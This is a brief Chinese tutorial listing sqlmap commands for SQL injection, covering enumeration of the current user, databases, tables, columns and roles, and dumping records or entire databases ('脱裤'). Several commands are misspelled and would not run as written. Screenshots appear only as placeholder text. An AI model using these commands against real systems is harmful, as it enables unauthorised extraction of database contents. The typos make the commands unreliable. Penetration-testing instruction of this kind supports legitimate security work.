当前位置: 代码迷 >> 综合 >> 渗透测试常用工具-sqlmap
  详细解决方案

渗透测试常用工具-sqlmap

热度:67   发布时间:2023-12-24 06:16:58.0

基本流程

扫描出部分系统信息

sqlmap -u "url"

在这里插入图片描述

sqlmp -u "url" --current-user

查询当前数据库用户名

在这里插入图片描述

sqlmap -u "url" --currnet-db

当前数据库
在这里插入图片描述

sqlmap -u "url" -D "db_name" --tables 

根据这个库查表名

在这里插入图片描述
根据库,表查字段

sqlmap -u "url"  -D "db_name" -T "tables_name" --columns 

在这里插入图片描述
查记录

sqlmap -u "url" -D "db_name" -T "tables_name" -C "columns_name" --dump

在这里插入图片描述

信息获取

列出其他数据库

sqlmap -u "url" dbs

在这里插入图片描述

枚举数据库用户角色

sqlmap -u "url" -roles

在这里插入图片描述

脱裤

sqlmap -u "url" --dump-all

目录都在根目录下的./sqlmap下
在这里插入图片描述